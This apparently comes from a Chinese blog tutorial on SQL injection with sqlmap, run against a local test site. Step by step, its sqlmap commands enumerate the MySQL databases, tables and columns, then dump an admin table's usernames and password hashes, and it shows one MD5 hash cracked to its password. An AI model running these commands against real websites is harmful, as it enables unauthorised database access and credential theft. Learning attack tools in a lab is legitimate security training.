sqlmap之(四)----Mysql注入实战

(1) 查找数据库

 

 

sqlmap.py -u "http://localhost/sqls/index.php?id=123" --dbs

 

 

 

数据库有8个。

 

(2) 通过第一步的数据库查找表(假如数据库名为test)

 

 

sqlmap.py -u "http://localhost/sqls/index.php?id=123" -D test --tables

 

 

 

猜解出来里面存在admin,sqltest两个表。

 

(3) 通过2中的表得出列名(假如表为admin)

 

 

sqlmap.py -u "http://localhost/sqls/index.php?id=123" -D test -T admin --columns

 

 

 

(4) 获取字段的值(假如扫描出id,user,pwd字段)

 

 

sqlmap.py -u "http://localhost/sqls/index.php?id=123" -D test -T admin -C "id,user,pwd" --dump

 

 

 

do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]

你想存储的哈希值来与其他工具最终进一步处理临时文件?   输入"Y"

 

do you want to crack them via a dictionary-based attack? [Y/n/q]

你想通过基于字典的攻击来破解他们吗?  输入"N"

 

马上就得到了用户名

 

与MD5的密码: 3f230640b78d7e71ac5514e57935eb69 去破解下得到"qazxsw"